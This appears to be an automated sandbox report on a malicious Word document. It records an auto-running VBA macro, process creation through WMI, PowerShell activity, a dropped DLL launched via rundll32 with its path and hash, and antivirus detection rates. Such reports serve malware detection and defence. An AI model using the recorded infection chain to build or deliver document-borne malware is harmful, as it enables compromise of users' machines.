Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A8217	10_2_003A8217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BC014	10_2_003BC014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B3C07	10_2_003B3C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003ABC63	10_2_003ABC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A8A60	10_2_003A8A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD45C	10_2_003BD45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC652	10_2_003AC652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B3856	10_2_003B3856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9055	10_2_003A9055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B10BB	10_2_003B10BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B60B9	10_2_003B60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A16B2	10_2_003A16B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC0B6	10_2_003AC0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB499	10_2_003BB499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD099	10_2_003BD099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A3E9E	10_2_003A3E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B4689	10_2_003B4689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B188F	10_2_003B188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC485	10_2_003AC485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B72F1	10_2_003B72F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B32F0	10_2_003B32F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD2EC	10_2_003BD2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B04E1	10_2_003B04E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B10E5	10_2_003B10E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6AE4	10_2_003B6AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B1ED9	10_2_003B1ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B84D9	10_2_003B84D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B5CDF	10_2_003B5CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B5AC3	10_2_003B5AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A32C2	10_2_003A32C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B893D	10_2_003B893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A6134	10_2_003A6134
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6D34	10_2_003B6D34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B6934	10_2_003B6934
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BE32D	10_2_003BE32D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B8F18	10_2_003B8F18
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B531E	10_2_003B531E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BD713	10_2_003BD713
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A6B79	10_2_003A6B79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A577E	10_2_003A577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BA972	10_2_003BA972
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7F6A	10_2_003B7F6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A2362	10_2_003A2362
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A4152	10_2_003A4152
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A5155	10_2_003A5155
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BC340	10_2_003BC340
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BA746	10_2_003BA746
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B43BF	10_2_003B43BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A65BF	10_2_003A65BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A85B3	10_2_003A85B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A73A8	10_2_003A73A8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9DAE	10_2_003A9DAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A9DAD	10_2_003A9DAD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AD1A3	10_2_003AD1A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7DA5	10_2_003B7DA5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB998	10_2_003BB998
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A3F9F	10_2_003A3F9F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A1B9C	10_2_003A1B9C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A7D8A	10_2_003A7D8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AED87	10_2_003AED87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC587	10_2_003AC587
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BE985	10_2_003BE985
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AB5F1	10_2_003AB5F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003B7BDC	10_2_003B7BDC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A4DCA	10_2_003A4DCA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003A0BCC	10_2_003A0BCC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003AC9C0	10_2_003AC9C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_003BB5C0	10_2_003BB5C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EC83F	11_2_003EC83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D923C	11_2_003D923C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D542D	11_2_003D542D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E502C	11_2_003E502C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D4C27	11_2_003D4C27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EBC21	11_2_003EBC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EC014	11_2_003EC014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D8217	11_2_003D8217
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E3C07	11_2_003E3C07
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D8A60	11_2_003D8A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DBC63	11_2_003DBC63
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED45C	11_2_003ED45C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E3856	11_2_003E3856
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D9055	11_2_003D9055
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC652	11_2_003DC652
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E10BB	11_2_003E10BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E60B9	11_2_003E60B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC0B6	11_2_003DC0B6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D16B2	11_2_003D16B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D3E9E	11_2_003D3E9E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003EB499	11_2_003EB499
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED099	11_2_003ED099
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E188F	11_2_003E188F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E4689	11_2_003E4689
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003DC485	11_2_003DC485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E32F0	11_2_003E32F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E72F1	11_2_003E72F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003ED2EC	11_2_003ED2EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E6AE4	11_2_003E6AE4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E10E5	11_2_003E10E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E04E1	11_2_003E04E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E5CDF	11_2_003E5CDF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E1ED9	11_2_003E1ED9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E84D9	11_2_003E84D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E5AC3	11_2_003E5AC3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D32C2	11_2_003D32C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003E893D	11_2_003E893D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_003D6134	11_2_003D6134

Document contains an embedded VBA macro which executes code when the document is opened / closed

Source: ARCH_25_012021.doc	OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation	OLE, VBA macro: Module A5ate73kc6cw5njy, Function Document_open			Name: Document_open

Document contains embedded VBA macros

Source: ARCH_25_012021.doc

OLE indicator, VBA macros: true

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\Kaktksw\An6othh\N49I.dll D09BACE1490F6EE322262FF2DA373E861F3B3B9BC03C386CE8A031648F1EAA4F

PE file contains strange resources

Source: N49I.dll.5.dr

Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.troj.evad.winDOC@28/8@1/5

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_002834DF CreateToolhelp32Snapshot,

16_2_002834DF

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$CH_25_012021.doc

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRBF96.tmp

Jump to behavior

Source: ARCH_25_012021.doc

OLE indicator, Word Document stream: true

Source: ARCH_25_012021.doc

OLE document summary: edited time not present or 0

Source: C:\Windows\System32\msg.exe	Console Write: ........................................ .3.......3.............0.......................#...............................h.......5kU.............	Jump to behavior
Source: C:\Windows\System32\msg.exe	Console Write: ................P...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........b.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......................{.............}..v.....=......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j..... {...............{.............}..v....(>......0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......................{.............}..v.....J......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.....................x.j......b...............{.............}..v.....K......0.T.............8.b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............lx.j......................{.............}..v....(.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....#...............lx.j..... {...............{.............}..v............0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....7..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....C..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O...............\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....O..................j....p.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.T.............XDb.....(.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....[..................j......................{.............}..v....@.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.6.2.............}..v....P.......0.T.............XDb.....$.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....g..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....s..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j..... ................{.............}..v..... ......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P'......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....(................{.............}..v.....(......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P/......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....0................{.............}..v.....0......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P7......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....8................{.............}..v.....8......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P?......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....@................{.............}..v.....@......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....PG......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....H................{.............}..v.....H......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....PO......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j.....P................{.............}..v.....P......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'...............\..j.....Gb...............{.............}..v....PW......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....'..................j.....X................{.............}..v.....X......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3...............\..j.....Gb...............{.............}..v....P_......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....3..................j.....`................{.............}..v.....`......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?...............\..j.....Gb...............{.............}..v....Pg......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....?..................j.....h................{.............}..v.....h......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K...............\..j.....Gb...............{.............}..v....Po......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....K..................j.....p................{.............}..v.....p......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W...............\..j.....Gb...............{.............}..v....Pw......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....W..................j.....x................{.............}..v.....x......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....c..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....o..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{...............\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....{..................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....P.......0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............Y.'.).}.}.c.a.t.c.h.{.}.}.$.B.5.8.I.=.(.'.O.3.'.+.'.5.I.'.).....0.T.............XDb.....<.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v............0.T.............................P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j....`.................{.............}..v............0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................\..j.....Gb...............{.............}..v....0.......0.T.....................r.......P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v....h.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v............ .......\..j......................{.............}..v............0.T.............XDb.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v.......................j......................{.............}..v....0.......0.T..............Db.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................<}.j......................{.............}..v............0.T...............b.............P...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.v....................<}.j....E.n...............{.............}..v....x>......0.T...............b.............P...............	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\msg.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString

Source: ARCH_25_012021.doc	Virustotal: Detection: 16%
Source: ARCH_25_012021.doc	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
